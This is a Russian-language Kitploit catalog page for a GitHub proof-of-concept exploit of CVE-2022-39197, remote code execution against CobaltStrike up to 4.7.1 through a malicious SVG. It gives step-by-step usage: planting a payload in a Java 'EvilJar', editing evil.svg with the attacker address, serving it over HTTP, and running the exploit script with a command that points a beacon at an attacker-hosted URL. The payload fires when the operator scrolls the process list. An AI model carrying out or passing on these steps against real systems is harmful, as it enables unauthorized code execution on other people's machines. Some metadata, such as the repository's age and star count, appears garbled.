Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-39197 — Эксплойт proof-of-concept для CVE-2022-39197, обеспечивающий удалённое выполнение кода против CobaltStrike <= 4.7.1 через вредоносный SVG-пейлоад, обслуживаемый по HTTP. | Kitploit
Инструменты/GitHubGitHub/its-arun/cve-2022-39197
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийКомандование и УправлениеRed TeamingРазработка Полезной Нагрузки
GitHubits-arun/cve-2022-39197

CVE-2022-39197

Эксплойт proof-of-concept для CVE-2022-39197, обеспечивающий удалённое выполнение кода против CobaltStrike <= 4.7.1 через вредоносный SVG-пейлоад, обслуживаемый по HTTP.

Репозиторий
38775213 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2022-39197: POC удаленного выполнения кода

Использование

  • Подготовка пейлоада
  1. Отредактируйте Строку 19, вставив свой пейлоад в EvilJar/src/main/java/Exploit.java
  2. Соберите с помощью jar mvn clean compile assembly:single
  3. Переместите EvilJar-1.0-jar-with-dependencies.jar из EvilJar/target/ в папку serve/
  4. Отредактируйте serve\evil.svg, заменив [attacker]
  5. Запустите сервер с помощью python3 -m http.server 8080
  • Запуск эксплойта
python3 cve-2022-39197.py beacon.exe http://10.10.10.2:8080/evil.svg

Пейлоад сработает, как только пользователь прокрутит список процессов

POC.JPG?

1.jpg

Ссылки

https://mp.weixin.qq.com/s/Eb0pQ-1ebLSKPUFC7zS6dg — Здесь есть отличный глубокий анализ этой уязвимости https://www.agarri.fr/blog/archives/2012/05/11/svg_files_and_java_code_execution/index.html

Скачать инструмент